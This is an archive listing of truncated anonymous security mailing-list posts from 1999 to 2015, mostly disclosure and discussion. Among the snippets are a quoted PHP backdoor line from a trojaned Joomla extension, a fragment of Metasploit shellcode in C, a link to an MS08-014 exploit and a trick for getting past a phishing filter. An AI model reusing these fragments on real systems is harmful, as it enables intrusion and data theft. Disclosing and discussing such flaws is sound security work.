Re: Micro Login System v1.0 (userpwd.txt) Password Disclosure Vulnerability

2015-08-21 Thread anonymous

Re: Re: Re: Re: Back door trojan in acajoom-3.2.6 for joomla

2009-12-07 Thread anonymous
== @mail($us1, $us2, "http://".$us2.$_SERVER['SCRIPT_NAME']."\n".$us3);

Re: [NOBYTES.COM: #12] osCommerce 2.2rc2a - Information Disclosure

2009-04-14 Thread Anonymous
php config on production servers should have the following directives set to display_errors = off log_errors = on error_log = /your/full/path/html/error.log

hm? new vulnerabilities? wav windows media

2008-12-29 Thread anonymous
#include int main() { /* win32_exec - EXITFUNC=process CMD=calc.exe Size=138 Encoder=None http://metasploit.com */ unsigned char scode[] = "\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b" "\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99" "\xac\x84\xc0\x74\x07\

Re: Hamachi Password Disclosure Vulnerability

2008-04-01 Thread anonymous
This is a bogus vulnerability. Ability to dump the process memory for a random system account implies that the system is fully compromised. Besides Hamachi 1.x does not use password-based login authentication as it's clearly stated in a product description.

MS08-014

2008-03-21 Thread Anonymous
MS08-014 I got the sample two weeks ago and I modified it into the useful exploit. Tested on: Microsoft Windows XP SP2 && Microsoft Offset 2003 < SP3 or No MS08-014 Patch http://www.chroot.org/exploits/zha0_ms08_014.rar Email: [EMAIL PROTECTED] [EMAIL PROTECTED]

Re: n.runs, Sophos, German laws, and customer safety

2007-08-30 Thread Anonymous
If nruns would be courageous enough, they would release this proof of concept tool to create prejustice and have the law checked. To my feeling, the German security scene suffers from paranoia rather than trying to find out how the law is enforced. nruns legal department should be able to cope

Re: Re: BlackBoard Multiple Vulnerabilities (XSS)

2007-06-14 Thread anonymous
My school just rolled out Blackboard Vista 4, and boy is it vulnerable :D

Re: Bypass phishing protection in Firefox / Opera

2007-03-29 Thread Anonymous
Another unpatch flaw in Antiphishing Firefox 2.0.0.1, 2.0.0.2, 2.0.0.3 is this: http://www.mozilla.com/firefox/its-a-trap.html DETECTED Now, add some characters "/": http://www.mozilla.com/firefoxits-a-trap.html ANTIPHISHING BYPASSED

Xbox 360 Hypervisor Privilege Escalation Vulnerability

2007-02-27 Thread Anonymous Hacker
Security Advisory Xbox 360 Hypervisor Privilege Escalation Vulnerability Release Date: February 28, 2007 Author: Anonymous Hacker <[EMAIL PROTECTED]> Timeline: Oct 31, 2006 - release of 4532 kernel, which is the first version containing the bug Nov 16, 2006 - pr

Re: HYSA-2006-005 WordPress 2.0.1 Remote DoS Exploit

2006-03-15 Thread anonymous
Couldn't you just target pretty much any dynamic page on the web with such a script? All you'd have to do is edit a few details. I don't understand how this qualifies as a security hole?

RE: Preventing exploitation with rebasing

2003-02-04 Thread Anonymous
> -Original Message- > From: David Litchfield [mailto:[EMAIL PROTECTED]] > Sent: Tuesday, February 04, 2003 12:09 AM > To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; > [EMAIL PROTECTED] > Subject: Preventing exploitation with rebasing > > So how easy is it to rebase DLLs and executables? Ver

Re: Win2k directory services weakness

2001-02-26 Thread Anonymous
There a few other ways to get to a hack of this sort. These also assume a compromised DC in one domain of a multidomain Forest. In the organization I work for we have not discovered a satisfactory resolution to these exposures. We may be heading towards the implementation of multiple forests

Source code to mstream, a DDoS tool

2000-04-30 Thread Anonymous User
It's been alleged that this source code, once compiled, was used by persons unknown in the distributed denial of service (DDoS) attacks earlier this year. Obviously such a thing cannot be confirmed aside from through a process of targeted sites making an appropriate comparison between the traffic

Re: Trusted process on an untrusted machine?

2000-01-20 Thread Anonymous Anonymous
Mike Frantzen wrote: > customized kernel that would fetch a kernel module off the net at boot Hmmm. Whose net? The real one or my spoof? If you can't trust the guy who has the hardware in his hands, you have a very difficult job I suspect.

No Subject

1999-11-22 Thread Anonymous
dler * * handle signals * * no return value */ void sighandler (const int signal) { printf ("received signal: %d... exiting!\n", signal); cleanup_and_exit (); } /* err * * print an error message. if arg0 is set add an errno message (perror like) *

Re: CERT Advisory CA-99-14 Multiple Vulnerabilities in BIND

1999-11-12 Thread Anonymous
/* * ADM CONFIDENTIAL -- (ADM Confidential Restricted when * combined with the aggregated modules for this product) * OBJECT CODE ONLY SOURCE MATERIALS * (C) COPYRIGHT ADM Crew. 1999 * All Rights Reserved * * This module may not be used, published, distributed or archived without * the wri

No Subject

1999-11-11 Thread Anonymous
Ooh, those pesky NXT records. Like I process those every day. Fascinating read in RFC 2535, but suppose I don't have any NXT records in my own zones, under what circumstances will my DNS server commit the sin of "the processing of NXT records"? In other words, are all of us vulnerable (even cach

No Subject

1999-08-22 Thread Anonymous
code, for full-disclosure purposes (hi aleph1!). See you later, your local anonymous ADM representative.

Re: Simple DOS attack on FW-1

1999-08-05 Thread Anonymous
I have another take on this thread that might also be of interest to those that have been following it since last week. First, kudos to Lance for the excellent documentation of the denial of service condition bought about by the mishandling of ACK packets by FW-1. But: 1) We also now have proof

No Subject

1999-07-11 Thread Anonymous
Hi folks, THC released a new article dealing with FreeBSD 3.x Kernel modules that can attack/backdoor the system. You can find our article on http://thc.pimmel.com or http://r3wt.base.org. Greets, pragmatic / The Hacker's Choice